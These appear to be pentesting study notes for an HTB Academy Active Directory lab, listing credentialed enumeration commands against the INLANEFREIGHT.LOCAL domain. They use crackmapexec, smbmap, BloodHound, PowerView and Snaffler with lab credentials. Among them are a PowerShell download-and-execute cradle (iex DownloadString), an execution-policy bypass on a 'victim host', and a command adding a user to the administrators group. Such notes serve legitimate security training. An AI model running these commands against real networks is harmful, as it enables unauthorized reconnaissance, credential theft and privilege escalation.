Comment on page
Credentialed Enumeration
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only
HTB_@cademy_stdnt! <RID>
python3 windapsearch.py --dc-ip 172.16.5.5 -u [email protected] -p Klmcargo2 --da
python3 windapsearch.py --dc-ip 172.16.5.5 -u [email protected] -p Klmcargo2 -PU
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
# Import Module
Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser
Get-ADTrust -Filter *
Get-ADGroup -Filter * | select name
GetADGroup -Identity <group-name>
Get-ADGroupMember -Identity <group-name>
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainOU
Find-InterestingDomainAcl
Get-DomainGroupMember
Get-DomainGPO
# Change this to the user
$sid=Convert-NameToSid "Domain Users"
# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Get-DomainPolicy
Get-NetLocalGroup
Get-NetLocalGroupMember
Find-InterestingDomainShareFile
Find-LocalAdminAccess
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping
Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
https://github.com/SnaffCon/Snaffler
Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
# Prints the PC's Name
hostname
# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version
# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Lists available modules loaded for use.
Get-Module
# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List
# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process
# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value
# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Status Firewall
netsh advfirewall show allprofiles
# Status Windows Defender
Get-MpComputerStatus
# Information about password requirements
net accounts
# Password and lockout policy
net accounts /domain
# Information about domain groups
net group /domain
# List users with domain admin privileges
net group "Domain Admins" /domain
# List of PCs connected to the domain
net group "domain computers" /domain
# List PC accounts of domains controllers
net group "Domain Controllers" /domain
# User that belongs to the group
net group <domain_group_name> /domain
# List of domain groups
net groups /domain
# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain
# Add user to administrators
net localgroup administrators [username] /add
# Check current shares
net share
# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain
# List all users of the domain
net user /domain
# Get a list of computers
net view
Last modified 6mo ago